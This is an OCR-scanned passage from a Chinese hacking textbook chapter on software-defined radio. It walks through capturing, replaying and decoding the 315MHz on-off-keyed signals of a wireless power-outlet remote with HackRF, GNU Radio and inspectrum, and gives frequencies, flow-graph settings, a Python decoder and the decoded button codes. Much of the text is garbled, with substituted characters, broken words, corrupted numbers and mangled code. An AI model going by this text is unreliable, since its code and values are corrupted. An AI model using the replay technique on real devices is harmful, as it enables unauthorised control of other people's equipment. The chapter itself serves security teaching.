员 会 (Federal Communications Commission，FCC) 和 国际 电信 联盟 (International 
Telecommunication Union，ITU)。 在 美国 ，FCC 管 理 RF 频 谱 ， 任 何人 只 有 在 取得 许 
可 之 后 , 才 可 以 使 用 未 许可 的 设备 (如 SDR) 传 输 RF 频 谱 。 要 取得 操作 无 线 电 的 许可 ， 
必须 参加 相应 考试 ， 以 证 明和 被 许可 人 了 解 FCC 的 规则 和 规定 。 可 访问 www.arrLorg 
来 了 解 许可 和 合法 的 无 线 电 操作 规则 。 


52 示例 


前 面 介绍 了 SDR, 下 面 将 评估 新 设备 , 以 便 了 解 如 何 使 用 SDR 以 及 关联 的 软件 。 
本 章 剩 余部 分 将 使 用 Ubuntu 系统 ， 可 以 使 用 HackRF SDR 和 gnuradio 工 具 ， 来 评估 宝 
内 无 线 壮 控 电源 插座 (Indoor Wireless Power Outlet，IWPO)。 和 选择 这 个 无 线 插座 并 没 
有 特殊 之 处 ， 笔 者 正好 有 这 种 设备 ， 并 且 十 分 简单 ， 用 一 章 的 篇 幅 就 能 讲 完 。 之 所 
以 选择 HackRF， 是 综合 考虑 了 了 功 能、 价格 和 易 访 问 性 等 因 系 。 本 章 使 用 的 软件 可 与 
其 他 几 种 经 济 实惠 的 SDR 平 台 一 起 使 用 。 

本 章 遵 循 的 一 般 过 程 称 为 搜索 、 捕获 、 重 放 、 分 析 、 预览 、 执 行 (Search、Capture、 
Replay. Analyze. Preview, Execute, SCRAPE). 


包含 实验 。 如果 已 经 拥有 硬件 ， 想 要 进行 模拟 ， 可 以 从 本 书 网 站 中 找到 
GNU 无 线 电 流 图 (GNU Radio Flow Graphs). Rit. ARKH AR 
代码 。 


5.2.1 搜索 


在 SCRAPE 过 程 的 搜索 阶段 ， 在 不 借助 任何 特殊 设备 的 前 提 下 ， 尽 量 找到 足够 
多 的 无 线 电 特 征 。 


你 已 经 知道 由 FCC 管 理 无 线 电 频 谱 ， 但 你 可 能 不 知道 ， 传 输 用 的 大 多 数 设备 必 
须 经 过 FCC 的 认证 才能 确保 无 线 电 设备 根据 FCC 的 规则 工作 。 "A BS BURL A 
证 时 ， 会 发 布 FCC ID, m] HFCC ID 必须 显示 在 产品 或 模块 上 。 这 个 FCC ID 是 重新 
发 现 RF 特 征 的 关键 。 

我 们 要 分 析 的 设备 是 Prime Indoor Wireless Power OutleGi12: 2x, "ds-1P9rpzsp. B 
使 不 购买 该 设备 也 能 遵循 本 章 的 步骤 去 做 。 这 个 中 控 器 的 FCC ID 是 QJX-TXTNRC。 


oo ÈE: 由 于 需要 购买 设备 ,未必 能 买 到 这 种 无 线 遂 控 插座 ， 因 此 本 节 不 
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该 ID 可 通过 贴 在 产品 表面 的 标签 找到 。 只 有 在 产品 码 上 使 用 -TXTNRC， 才 能 通过 
搜索 FCC 设备 许可 找到 该 设备 的 报告 。 为 避 开 这 个 问题 ,只 需要 使 用 Google 进 行 搜 
索 ， 如 下 所 示 : 

www .google.com/search?q=fcct+tQJX-TXTNRC 


fccid.io 网 站 通常 显示 在 最 前 面 。 这 里 ， 最 靠 前 的 链接 是 https://fecid.io/ 
QJX-TXTNRC. 


图 5-1 ”遥控 器 图 片 


在 fecid.io 上 找到 几 个 链接 的 文档 和 报告 ， 从 中 可 以 了 解 到 ， 该 设备 的 工作 频率 
是 315MHz。 这 些 报告 中 包含 工作 频率 、 样 本 波形 图 (指示 传输 类 型 )、 时 间 指 标 ( 指 
示 数 据 包 的 长 度 ) 以 及 不 同 脉冲 宽度 。 将 工作 频率 范围 用 作 起 点 , 将 测试 报告 的 其 余 
部 分 用 于 完成 测试 后 的 完整 性 检查 。 


5.2.2 ”捕获 


了 解 到 工作 频率 后 ， 束 有 了 足够 多 的 信息 来 开始 试验 SDR 和 试验 被 测 设备 
(Device Under Test，DUT)。 此 时 ,需要 安装 SDR(HackRF) 和 软件 (gnuradio 和 HackRF 
工具 )， 配 备 一 根 能 接收 315MHz(ANT500 75MHz~1GHz) 信 扎 的 天 线 。 本 书 不 直接 
介绍 安装 过 程 ， 但 建议 使 用 PyBOMBS， 并 使 用 PyBOMBS 的 prefix 参 数 将 工具 安装 
到 主 目 录 。 通 过 将 其 安 搬 在 主 目录 ， 可 以 答 试 多 种 配置 ， 在 将 来 过 到 更 新 问题 时 ， 
也 可 以 更 方便 地 恢复 。 可 从 本 书 的 下 载 站 点 中 找到 一 个 README.txt 文 件 ， 该 文件 
包含 关于 安装 工具 的 说 明 ， 本 章 在 GNU Radio Companion 中 使 用 的 流程 图 ， 以 及 在 
缺少 该 设备 时 供 分 析 用 的 捕获 文件 。 

GNU Radio Companion( 通 过 运行 snuradio_companion 来 启动) 是 一 个 GUI 工具 ， 
允许 用 户 通 过 链接 一 个 或 多 个 信号 处 理 块 来 创建 软件 无 线 电 。 该 工具 生成 Python 代 
码 ， 人 允许 用 户 定 义 变 量 并 在 GUI 中 使 用 Python 语 铝 。 要 捕获 信息 供 未 来 分 机 ， 可 参 
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考 图 5-2 中 的 流 图 。 建 议 浏览 块 面板 树 来 熟悉 可 用 的 块 。 但 在 目前 ， 可 参考 表 5-2 对 


流 图 中 使 用 的 块 的 描述 。 


进行 重 放 和 离线 分 析 。 


为 尽量 减少 需要 传递 的 信息 量 ， 使 用 File Sink 编 写 数据 ， 


remote analysis.grc - /GH5 - GNU Radio Companion 


‘ile Edit View Run Tools Help 


TA 
Options 


osmocom Source 


File Sink 
QT GUI Frequency 


Variable 


osmocom Source | QT GUI Frequency Sink 


Sample Rate (sps): 4M sadi Size: 1.024k 


nter €— (Hz): 316M 


— (Hz): 


Cho: IQ Balance Mode: Off 


ChO: Gain Mode: Manual File Sink 


Ch0: RF Gain (dB): 0 | File: ...mote2-loff-4m-316mhz 


Ch0: IF Gain (dB): 16 Unbuffered: Off 


Ch0: BB Gain (dB): 16 Append file: Overwrite 


图 5-2 ”捕获 流 图 : remote analysis.grc 


表 5-2 ”捕获 需要 的 GNU Radio 块 的 描述 


目的 
提供 整体 性 流 图 选项 


提供 与 价 件 交互 的 接收 强 


指定 要 写 入 文件 的 样本 
收 到 的 信号 的 正弦 图 ( 基 
于 频率 和 幅 值 ) 


提供 用 于 常见 值 (如 
Sample Rate) 的 变量 


相关 参数 

ID: 生成 的 Python 代 码 的 名 称 
Generate Options: 使 用 的 GUI 框 染 ( 默 i 
为 QT)。 可 以 只 使 用 与 该 决 案 对 应 的 块 
(QT 或 Wx) 
Sample Rate: 每 秒 样 本 数量 

习 整 到 的 载 频 (考虑 
到 DC 偏 移 ， 使 用 316MHz) 
Ch0:RF Gain 一 一 通 剃 情况 下 ， 除 非 有 特 
File， 己 捕获 桩 本 的 文件 名 
Center Frequency: 图 中 心 的 频 座 (应 设 
为 Ch0 Frequency) 
Bandwidth: 设置 为 Sample Rate 
值 可 以 是 任何 合法 的 Python 语 句 ， 比 如 
int(400/27) 
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— 注意 : 必须 指出 采样 奉 和 信道 频 府 ， 在 使 用 离线 工具 和 重 放 攻 击 (Replay 
V—x — Attack)R], i EAE EM, 


在 捕获 阶段 ， 尝 试 为 每 个 已 知 的 刺激 信号 (Stimulus) 创 建 捕获 文件 。 在 这 里 的 
DUT 中 ， 按 下 每 个 容器 的 on/off 按 钮 进行 启动 和 停止 。 另 外 ， 为 帮助 理解 设备 的 协 
议 ， 使 用 两 个 遥控 器 进行 比较 。 此 时 ， 基 于 对 测试 报告 的 理解 ， 可 看 到 一 个 尖峰 为 
315MHz 左 右 ， 如 图 5-3 所 示 。 还 将 看 到 ， 男 一 个 尖峰 为 316MHz; 这 是 测试 设备 (DC 
偏 移 ) 的 工件 ， 与 此 处 的 测试 无 关 。DC 偏 移 显 示 在 中 心 频率 处 ， 正 因为 如 此 ， 将 接 
收 器 调整 为 316MHz， 将 其 移 走 。 此 时 ， 已 经 捕获 足够 多 的 数据 ， 可 进入 下 一 阶段 ， 
即 “ 重 放 ” 阶 段 。 


Remote Analysis 


-40 314.979 MHz, -40.01 dB 
-60 | 
9 Nn 
S o] «(f iw ee T bn i seat plah ^ ane , 
E M Wi | iy TT ALI 
A HY T d | 
* -100 | 
-120 


频率 z 
一 一 一 一 一 一 一 一 一 Fr 
图 5-3 ”捕获 的 信号 


5.2.3 BR 

现在 已 经 捕获 了 信息 ， 接 下 来 答 试 重 放 数 据 。 虽 然 无 法 成 功 地 重 放 数 据 不 见得 
意味 看 未 能 正确 地 捕获 数据 ， 但 成 功 地 重 放 数 据 则 表明 可 能 存在 通信 和 缺陷。 在 关注 
安全 的 系统 中 ， 应 当 实 施 反 重 放 缓解 措施 ， 以 防止 未 授权 的 访问 。 此 类 设备 的 一 般 
使 用 是 开关 灯 、 风 届 或 其 他 一 些 简 单 设备 。 因 此 ， 我 怀疑 可 能 并 未 缓解 重 放 攻击 。 
车 放 攻击 的 主要 目的 是 在 对 设备 了 解 甚 少 的 情况 下 成 功 地 练习 使 用 设备 。 

重 放 阶段 的 流 图 与 捕获 阶段 相似 ， 只 是 现在 将 文件 用 作 源 ， 将 osmocom 用 作 
Sink。 必 须 重 复 使 用 相同 的 采样 率 和 频率 ， 以 便 在 收 到 信号 时 重新 生成 信号 。 万 外 ， 
图 5-4 中 添加 了 Multiply Const. QT GUI Time Sink 和 Throttle 块 ， 以 便 在 需要 时 加 以 调 
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整 。 添 加 了 Throttle， 这 样 ， 即 使 没有 有 效 限 制 数据 速率 的 外 部 Sink， 也 可 保持 CPU 
使 用 率 较 低 。 如 果 禁 用 osmocom Sink 而 且 缺 少 Throtte， 从 文件 读 取 数据 的 速率 不 会 
受到 限制 ，CPU 使 用 率 可 能 较 高 。 


o ER: 务必 使 用 Kill(f7) 函 数 关闭 运行 流 图 ， 以 允许 SDR 进 行 适当 清理 。 
KS 我 发 现 ， 有 时 ， 即 便 使 用 Ki 函数 ， 发 送 器 也 会 继续 传送 ; 因此 ， 在 完 
成 后 ， 要 确保 不 再 继续 传输 。 令 人 道 幅 的 是 ， 只 有 使 用 第 二 个 SDR 监 测 
传输 ， 才 能 方便 地 确定 是 否 存在 继续 传输 的 情况 。 可 以 重 置 设备 来 确保 
传输 已 经 停止 。 


当 流 量 最 初 使 用 Multiply 常 量 1 运 行 时 , 吧 控 器 并 未 启用 。 从 图 5-5 的 频率 图 可 看 
到 ， 至 少 ， 传 输 频率 是 正确 的 ， 因 此 ， 一 定 是 其 他 一 些 因素 阻碍 了 进度 。 由 于 正 处 
于 重 放 阶段 ， 并 未 对 协议 进行 完整 的 逆 同 工程 ， 可 旋转 其 他 几 个 旋钮 。 时 间 图 显示 
时 间 域 中 的 信号 , 义 轴 是 时 间 ,Y 轴 是 幅 值 .图 5-5 中 ,传输 信号 的 幅 值 范围 为 -0.2~0.2， 
这 不 足以 驱动 匠 控 器 的 接收 费 。 此 时 ， 只 需要 将 Multiply 常 量 改 成 4， 并 再 次 尝试 (这 
己 经 反映 在 图 5-4 的 流 图 中 )。 


remote analysis replay.grc - /GH5 - GNU Radio Companion 


File Edit View Run Tools Help 


Variable 
ID: freq 
Value: 316M 


Throttle 
53 Sample Rate: 4M 


QT GUI Time Sink 
Number of Points: 1.024k | 
Sample Rate: 4M 

Autoscale: No 


al Cho: BB Gain (dB): 20 

OT GUI Frequency Sink | 
| FFT Size: 1.024k 
| Center Frequency (Hz): 316M | 
| 


Bandwidth (Hz): 4M 


Kj5-A EGM]: remote analysis replay.grc 
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Remote Analysis Replay 


| 

a | 

| | 外 Wl | 
D | J | 
I | Wid Vik ad] 

| Wi | 

| TER | | a a 
TI | IIT | | | Wt 


时 间 (us) 
0 
-20 
-40 
| d t il ' | LE M FAC al ut iih fa ha. conte 
"NOE Wit aU 
E | 
m -100 E 
-120 
-140 | 
314.000 314.500 315.000 315.500 316.000 316.500 317.000 317.500 31 
频率 (MHz) 
FE E p 


图 5-5 时间 和 频率 图 


很 多 情况 下 ， 成 功 重 放 的 能 力 意味 痢 “ 游 戏 结束 了 ”。 例 如 ， 如 末 门 访问 控制 
设备 没有 采用 重 放 绥 解 措施 , 则 攻击 者 可 以 获取 样本 , 并 在 未 获 授 权 的 情况 下 访问 。 
这 样 ， 我 们 束 成 功 地 重 放 了 捕获 的 信号 ， 可 进入 “分 析 ” 阶 段 了 。 


5.24 分 析 


到 目前 为 止 ， 已 经 证 明 我 们 可 捕获 和 重 放 信号 ， 但 并 不 知道 传输 的 内 容 。 在 该 
阶段 ， 将 答 试 学 习 按 下 不 同 按钮 时 的 设备 差 开 ， 并 确定 是 售 能 够 职能 地 排除 其 他 遥 
FS ato 为 完成 这 两 项 任务 , 必须 学 习 如 何 编 介 数据。 虽然 可 使 用 gnuradio_companion 
执行 分 机 ， 但 这 里 将 使 用 故 一 个 工具 inspectrum 来 简化 工作 。 

inspectrum(https://github.com/miek/inspectrum) 是 一 个 离线 无 线 电信 号 分 析 絮 ,可 
用 于 处 理 已 捕获 的 无 线 电 信和 号。 在 撰写 本 书 时 , 在 Ubuntu 中 使 用 apt 安 装 的 inspectrum 
版 本 落后 于 最 新 版 本 ， 示 包含 一 些 极其 有 用 的 功能 。 建 议 从 GitHub 构 建 。 为 从 来 源 
构建 inspectrum， 还 需要 安装 liquid-dsp。 在 Ubuntu 的 基础 安装 中 ， 可 使 用 本 书 网 站 
Analyze 目 录 下 README.txt 文 件 中 的 命令 ， 来 安装 Inspectrum。 

要 在 站 之 间 传 输 数 据 ， 载 波 信号 用 待 传输 的 数据 进行 调制 。 载 波 信号 或 频率 是 
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双方 都 知道 的 ， 承 载 着 数据 。 使 用 on-off 按 键 是 一 种 简单 的 幅 值 调制 方法 ， 导 致 存 
在 或 缺少 传 轩 信 息 的 载波 频率 (如 图 5-6 所 示 )。on-off 搁 键 的 一 种 简 蛙 形式 是 只 含有 
一 个 周期 的 脉冲 ， 周 期 中 存在 脉冲 是 1， 缺 少 脉冲 是 0。 一 种 稍 复杂 的 形式 是 使 用 长 
脉冲 作为 1， 使 用 短 脉 冲 作为 0。 从 一 定 幅 值 到 无 幅 值 的 最 小 转换 时 间 量 称 为 符号 赂 
期 (Symbol Period). 


Remote Analysis File 


m Data 0 


-0.1 


-0.2 - 


ll peau peau pues paca 
5,000 6,000 7,000 8,000 9,000 10,000 


时 间 (us) 
图 5-6 ”用 时 间 图 显示 on-off 近 和 键 


安装 inspectrum 后 ， 只 需要 运行 ， 并 对 GUI 中 的 样本 做 必要 的 调整 。 如 果 没 有 设 
备 ， 可 使 用 本 书 网 站 Capture 目 录 中 的 capture 文 件 。 在 图 $-7 中 可 注意 到 ， 已 经 开局 
了 捕获 ,启用 outlet 1(remotel-lon-4m-316mhz), 将 采样 率 设置 为 4000 000( 捕 获 信和 号 
的 速率 )。 横 轴 是 时 间 ， 纵 轴 是 频率 。 可 将 信息 的 闫 色 视 为 强度 ， 并 通过 移动 Power 
max 和 Power min 清 块 进行 调整 。 在 本 例 中 ， 移 动 Power max 和 Power min 滑 块 将 看 到 
明显 的 边界 。 垂 直 比 例 尺 上 的 -1MHz 指 316MHz~1MHz( 或 31SMHZ。 另 外 ， 沿 着 该 
图 的 水 平方 回 ， 可 看 到 一 串 点 ， 点 的 大 小 各 不 相同 ， 之 间 有 空 际 。 在 当前 的 工作 频 
率 下 ， 这 串 点 看 上 去 像 摩 斯 电码 ， 指 示 on-off 近 键 。 


97 


98 


第 1 部 分 备 A 


inspectrum: remote1-10n-4m-316mhz 


Controls co ATTE LIT T T T tt LET ET ETT T T T L| T TJ 1 
40.760000 0.770000 0.780000 0.790000 


Open file... 


Sample rate: 4000000 


Spectrogram 

FFT size: = 
Zoom: 

Power max: 一 一 一 
Power min: 
Scales: y 


Time selection 
Enable cursors: 
Symbols: 1 
Rate: 

Period: 

Symbol rate: 
Symbol period: 


K|5-7 inspectrum E] 


HEBR meta A SATA, FREES. SNE, 
inspectrum 提 供 了 多 个 工具 ， 用 来 度量 信号 和 捕获 从 号 数据 。cursor 函 数 所 供 了 一 种 
方式 ， 人 允许 以 图 形 方 式 将 图 形 分 解 为 指定 长 度 的 符号 。 另 外 ， 鼠 标 中 键 隐藏 着 诬 加 
幅 值 图 并 提取 符号 的 能 力 。 在 图 5-8 中 可 以 看 到 ， 在 符 写 周期 272ps 处 洪 加 光标 ， 信 
EA mS. DAETA, ERMIS AIOC m, MOCE 
在 同一 符号 结束 处 对 齐 。 然 后 移动 区 域 在 所 有 符号 开始 处 对 齐 ， 并 增加 符号 数量 。 
最 初 的 符号 周期 并 不 精确 ， 但 应 当 大 致 正确 。 要 点 是 确保 所 有 符号 边缘 与 周期 边缘 
对 齐 。 即 使 如 此 简单 的 一 个 图 形 ， 也 传递 出 了 一 些 重 要 信息 : 

e 最 小 周期 脉冲 是 272hs。 

e 最 长 周期 脉冲 等 于 最 小 周期 脉冲 的 三 倍 。 

e 在 一 个 脉冲 开头 和 下 一 个 脉冲 开头 之 间 出 现 四 个 272us 人 符号 周期 。 


x inspectrum: remote1-1on-4m-316mhz 
Controls Sx) ? MH 
Open file... 

Sample rate: 4000000 aa Add derived plot Add samy bE 
| Add amplitude plot 

Spectrogram Export samples to file... Add frequency plot 

FFT size: — | Add phase plot 

Zoom: 一 

Power max: — | 

Power min: — | 

Scales: y 


Time selection 
Enable cursors: (W 


Symbols: B - 
Rate: 459.559Hz 
Period: 2.176ms 


Symbol rate: — 3.67647kHz 
Symbol period: 272us 


图 5-8 MWENS 
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注意 ， 在 分 析 符 号 周期 之 后 ， 应 当 增 加 符号 数量 ， 看 一 下 是 售 在 整个 数据 包 中 
继续 与 短线 边 绿 对 齐 。 只 需要 纵 放 图 形 ， 看 一 下 最 后 一 个 脉冲 的 对 齐 位 置 。 这 里 稍 
有 偏差 ， 需 要 稍 拉 长 周期 ， 使 符号 周期 是 275ns 而 非 272ns。 这 符合 预期 ， 需 要 考虑 
本 例 中 初始 测量 乘 以 100 所 产生 的 误 笑 。 

确认 符号 率 和 周期 后 ， 可 提取 符号 ， 将 其 转换 为 二 进 制 数据 。 为 此 ， 使 用 鼠标 
中 键 获得 幅 值 图 。 添 加 幅 值 图 时 ， pes 加 一 个 新 的 数据 框 ， 其 中 有 三 个 水 
平行 。 数 据 框 的 中 心 必须 是 符 写 数据 ， 以 获取 新 增 的 幅 值 图 上 的 符号 数据 帆 值 图 。 
此 时 ， 当 数据 框 以 符 MERC $ Ponci max 和 Power mini E et XB. AA 
开始 像 方 小 (如 图 $-9 所 示 )。 一 旦 方 流出 现 ， 可 再 次 使 用 鼠标 中 键 将 符号 发 送 到 标准 
前 出 (stdout)。 在 调用 Inspectrum 的 命令 行 上 显示 提取 的 值 ( 如 图 5-10 所 示 )。 此 时 ,将 
运用 一 些 Python 编 程 知 识 ， 将 幅 值 同 量 转换 为 二 进 制品 量 ， 从 而 进一步 加 以 处 理 。 


inspectrum: remote1-10n-4m-316mhz 


Controls DAR ? MH? HEHHE 3 
mu a ! 10.770000 
Open file... rt 
Sample rate: 4000000 | fee 
Spectrogram 
FFT size: -— | 
Zoom: mi == : 
Power max: -— B 
Power min: — 上 
Scales: v 


Time selection 
Enable cursors: v 


Symbols: 100 = | 
Rate: 36.3372Hz SEHE 

Period: 27.52ms | | || | Export samples to file... 

Symbol rate:  3.63372kHz [qn EEIEIEE — Remove plot 


Symbol period: 275.2ys 


图 5-9” 幅 值 图 


inspectrum -r 4e6 

29./802, 206.000, 25.8549, -0.9900/1, 2/.835/, -0.998904, -0.998/02 
, -08.994081, 32.7964, -0.999115, -8.997728, -0.999726, 29.0988, 25 
.6444, 27.6885, -6.994452, 29,8818, -0.,995214, -0.997058, -0.99389 
2, 29.0982, -0.988195, -0.99789, -0.999953, 28.6322, -0.990631, -9 
.999/33, -0.9990/1, 28.408, 28.6255, 28.453, -0.99927460, 26.80/f, 2 
6.435, 27.8199, -0.998781, 27.6517, 27.5859, 27.9833, -0.998661, 2 
8.8751, -0.997175, -6.995966, -6.997366, 31.9832, 25.9203, 27.4232 


, -0.999895, 29.0916, 30.0564, 28.2907, -0.997612, 29.7188, -0.999 
093, -0.99953, -0.990107, 29.4778, -0.998365, -0.999591, -0.996273 
, 29.0294, -0.992539, -0.997177, -0.994108, 27.9542, -0.988611, -0 


.997905, -0.991576, 30.1545, -0.994627, -0.999654, -0.999728, 29.7 
667, -0.990091, -0.997739, -0.996428, 31.4143, -0.99653, -0.997938 
-0.99515, 29.1736, -0.999942, -0.994687, -0.997503, 29.8853, -0. 
, -8.995862, -0.992811, 29.1608, -0.998348, -0.9989829, -0.99 
30.197, 29.8323, 28.1554, -0.985482, 30.7071, -0.996123, -0.9 

, -0.993444, 


图 5-10 ”提取 的 符号 
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提取 的 符号 在 -1~45 之 间 ， 因 此 需要 将 符号 转换 为 二 进 制 数据 进行 简化 处 理 。 
合理 的 转换 方法 是 选择 一 个 国 值 ， 大 于 该 赋 值 则 是 二 进 制 1， 小 于 该 阀 值 则 为 二 进 
制 0。 在 下 和 耐 显 示 的 decode-inspectrum.py 肢 本 中 ， 用 尸 可 基于 从 inspectrum 提 取 的 值 


注意 : 实际 的 最 大 值 和 最 小 值 取 决 于 Power min/maxiX £. 这 里 给 decode 


函数 添加 了 thresh( 代 表 threshold， 即 阅 值 )， 将 不 同 的 值 纳入 考虑 范围 。 


GH5 > @ ipython 
Python 2.7.12 (default, Nov 19 2016, 06:48:10) 
Type "copyright", "credits" or "license" for more information. 


IPython 2.4.1 -- An enhanced Interactive Python. 

2 -> Introduction and overview of IPython's features. 
$quickref -> Quick reference. 

help -> Python's own help system. 

object? -» Details about 'object', use 'object??' for extra details. 


In [1]: € load decode-inspectrum.py 
In [2]: #!/usr/bin/env python 


import bitstring 
from bitstring import BitArray, BitStream 


def decode (pfx, thresh, symbols): 
symbolString-'' 


for i in symbols: 
if i»thresh: 
symbolStringt='1' 
else: 
symbolStringt='0' 


hexSymbols =BitArray('0Ob'+symbolString) 
convertedsymbols = 
hexSymbols.hex.replace('e','1').replace('$','0') 
print "{0:<12s} {1}". format (pfx,hexSymbols) 
print "1024 liza} 
{1}".format (pfx, BitArray ('Ob'+convertedSymbols[:-1])) 
print symbolString 


In [3]:  tmp-45.7106, 43.0641, 42.8859, -0.997174, 45.5352, 
-0.995606,-0.994913, -0.989177, 45.2986, -0.998486, -0.981316, 


-0.984748, 45.0039, 


-0 2399713; 


-0.993749, 
43, -0.994591, 
43.0113, 
45.4522, 
-0.994588, 
46.7498, 
-0.995792, 


42.6714, 


-0.99464, 
45.0919, -0.996337, 
44.9794, 
44.4547, 
-0.995795, 
-0.998652, 
-0.99624, 
-0.994224, 
-0.999524, 
46.2743, -0.999445, -0.993939,;  -0.993339, 
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44.4738, 44.0162, -0.994073, 46.2821, -0.998813, 
44.2832, -0.999628, -0.987948, -0.997018, 
-0.997126,-0.998506, 42.7926, 43.4177, 43.1203, 
44.0526, 42.7063, -0.978449, 45.0448, 43.6918, 
-0.998408, -0.99975, -0.996846, 45.9868, 
46.6085, 44.3158, 43.4926,-0.991413, 
-0.997505, -0.997841, 46.1299, -0.987929, 
45.6862, -0.999114, -0.989554, -0.999472, 
-0.980936, -0.997128, 46.893, -0.997465, 
45.7666, -0.995871, -0.997738, -0.99807, 
45.9906, -0.996238, 


-0 . 998326, -0 - 99569, 45-12; 0.991533, -0.999d07, —U. 997144, 44.53068; 
-0 . 992277, 0.998709, 0.995844, 45.6867, 43.0238, 43.9998, 0.996441, 


44.4935, 


-0 .998675, 


二 999303; -70-9857769 


In [4]: eo decode ("one on",10, tmp) 


one on 
one on 


(5) 0xe88e888eee8ee8888888888e8 
Q 0x91d801 


@ 1110100010001110100010001000111011101110100011101110100010001000 
100010001000100010001000100011101000 


In [5]: quit 


为 以 交互 方式 处 理 数据 ， 这 里 使 用 ipython 人 @ ， 不 过 ， 尽 可 以 用 自己 选择 的 方式 


运行 代码 。 使 用 ipython 的 


个 优势 在 于 可 以 修改 例 程 , 并 按 上 自己 的 意愿 重新 加 载 仿 。 


decode@ 例 程 接收 来 自 inspectrum 的 提取 符号 的 输出 @ ， 显 示 解 码 的 数据 ， 格 式 是 
原始 十 六 进 制 @ 、 转 换 后 的 符号 @ 和 原始 二 进 制 @ 。 转 换 后 的 符号 基于 这 样 的 事 


SE: on-off ett LEAMS. 二进制 数据 同样 反映 这 两 个 符号 ,长 脉冲 是 Oxe， 
短 脉 冲 是 0x8。 下 面 显 示 在 所 有 捕获 上 运行 decode 的 结果 。 

# Hex representation of symbols 

i Data separated on groupings of 2 bits, 16 bits, 7 bits 

remote 1 one on Uxe8 8e880eee0ee08800 858880609 

remote 1 two on Uxe8 BeB888eeeBee88888 8888688 

remote 1 three on 0xe8 8e888eee8ee88888 888e888 

remote 1 one offt 0xe8 8e888eee8ee88888 8886689 

remote 1 two off 0xe8 8e888eee8ee88888 8868868 

remote 1 three off Oxe8 8e888eee8ee88888 88e8888 

remote 2 one on OxeS ee80eeeececeDeococe 05885609 

remote 2 two on 0xe8 eebeeeeeeeebeeee 8888688 

remote 2 three on Oxe8 eeS8eeeeeeeeDeeoee 8886888 

remote 2 one offt Uxe8 eedteccecececetdeece 08066080 

remote 2 two offt 0xe8 ee8eeeeeeeec8eecce 8868869 

remote 2 three off  0xe8 eeBeeeeeeeedeeee 0868888 


i Converted values 
remote 1 one on 


(assuming Oxe=1 and 0x8-0) 
0x91d801 
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remote 1 two on 0x91d802 
remote 1 three on 0x91d804 
remote 1 one offt 0x91d806 
remote 1 two off 0x91d809 
remote 1 three off Ox91d808 
remote 2 one on Oxb /fbcl 
remote 2 two on Oxb/fbc2 
remote 2 three on Oxb/fbc4 
remote 2 one off Oxb/fbco 
remote 2 two off Oxb/fbc9 
remote 2 three off Oxb/fbc8 


AUI AS BER E REATUS BLISS PATER» 但 好 像 一 直 以 二 进 制 10( 下 六 进 制 表示 
形式 是 0xe8) 开 头 。 此 后 ， 数 据 只 是 因 遥 控 器 而 异 ， 这 或 许 是 因为 编 址 方案 的 差 元 ， 
所 以 ， 遥 控 器 仅 用 于 成 对 插座 (Paired Outlets)。 如 果 比 较 两 个 遥控 器 上 的 同一 操作 ， 
会 明显 看 到 ， 最 后 4 位 征 执行 的 操作 ( 即 开局 Outlet 1D)。 全 此 ， 事 情 变 得 更 清 芭 D, 
重 放 攻击 只 适用 于 成 对 插座 。 


525 Ma 


希望 上 述 努 力 能 够 有 所 回报 ， 现 在 可 以 使 用 分 析 结 果 合 成 数据 。“ 预先 ” 步 又 
的 目的 是 : 在 传输 前 ,确保 我 们 要 发 送 的 数据 与 期 望 类 似 。 可 将 这 个 步 又 与 “执行 ” 
步 又 合 为 一 体 ， 但 我 认为 ,“ 预 虎 ” 步 骤 有 必要 单独 完成 ， 不 建议 跳 过 这 一 步骤 直 
接 开 始 传输 。 

到 目前 为 止 创建 的 流 图 都 较为 简单 ， 几 乎 没有 活动 组 件 。 为 从 头 创建 信号 ， 需 
要 使 用 几 个 新 块 ， 如 表 5-3 所 示 。 图 5-11 中 的 流 图 包括 osmocom Sink 块 , 但 需要 注意， 
箭头 显示 为 灰色 ， 这 个 块 的 颜色 也 突出 显示 ; 这 表明 已 被 禁用 。 另 一 个 微妙 的 改动 
之 处 是 ， 已 切换 到 1MSps 而 非典 型 的 4MSps。 由 于 我 们 正在 合成 数据 ， 因 此 不 必 使 
用 与 前 面相 同 的 采样 率 。 另 外 ， 通 过 这 个 所 选 的 采样 率 ， 可 方便 地 看 到 采样 率 是 
275us. 


表 5-3 Hid 8 S PXBUNIGNUJZCZX RA frs 


名 称 相关 参数 


Vector 要 传输 的 二 进 制 数据 的 癌 量 

Patterned 将 多 个 源 合 并 到 一 个 同 量 中 | 输入 模式 , dn HABER RS 

Interleaver 数量 。 这 里 组 合 了 不 变数 据 、 地 址 、 操 作 和 
[8] pig 

Constant 2h patterned interleaverte ft ii 

Source 量 二 进 制 0, 以 处 理 数据 包 的 


[8] Bg 
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(AER) 


名 各 相关 参数 


Repeat 在 传输 前 ， 基 于 sample rate | Interpolation: sample rate * symbol rate 
和 symbol rate 重 复 每 个 二 进 IMSps * 275us/symbol = 275 samples per 
制 值 ， 将 二 进 制 模 式 转 换 为 symbol 
从 写 模 式 


Multiply 将 数据 与 载波 混合 (调制 ), SE 
际 上 会 开局 、 关 闭 载 频 
(on-off 按 键 ) 
Source 生成 载 频 Sample Rate: 1M 


Waveform: Cosine 


Frequency: 314.98MHz 
osmocom Sink | 通过 SDR 传 输 所 提供 的 数据 Sample Rate: 1M 

Ch0: Frequency——314.98MHz 
Ch0: RF Gain——8 


Lest-preview.grc - /GH5 - GNU Radio Companion 
File Edit View Run Tools Help 


^'.m-2x 7^3 e D» . 


Options Variable | Variable 
ID: top block ID: symbol rate | ID: samples per symbol 
Generate Options: OT GUI Value: 275u | Value: 275 
1 


Vector Source 
Vector: 1,1, 1..1, 0, 0, 0 
Tags: 

Repeat: Yes 


| QT GUI Frequency Sink 

| FFT Size: 1.024k 

| Center Frequency (Hz): 316M 
| Bandwidth (Hz): 1M 


Vector Source 


Vector: (1,0,0,0,1,1,1,0,1... 


Repeat: Yes Repeat Cho: Frequency (Hz): 314.98M 
D eee Interpolation: 275 Ch0: Freq. Corr. (ppm): 0 
| Ch0: RF Gain (dB): 10 
— — | | Ch0: IF Gain (dB): 20 
Constant: 0 Am. 


Ch0: BB Gain (dB): 20 


osmocom Sink 


Sample Rate: 1M ate: 
Waveform: Cosine File Sink . Sample Rate; 1M 
Frequency: 314.98M File: /GH5/test-preview 
Amplitude: 1 


Offset: 0 


Unbuffered: Off 
Append file: Overwrite 


图 5-11 Hew: test-preview.grc 


X 1 sione on 命令 的 二 进 制 表示 的 模式 如 下 : 


Pattern - 
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[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, 
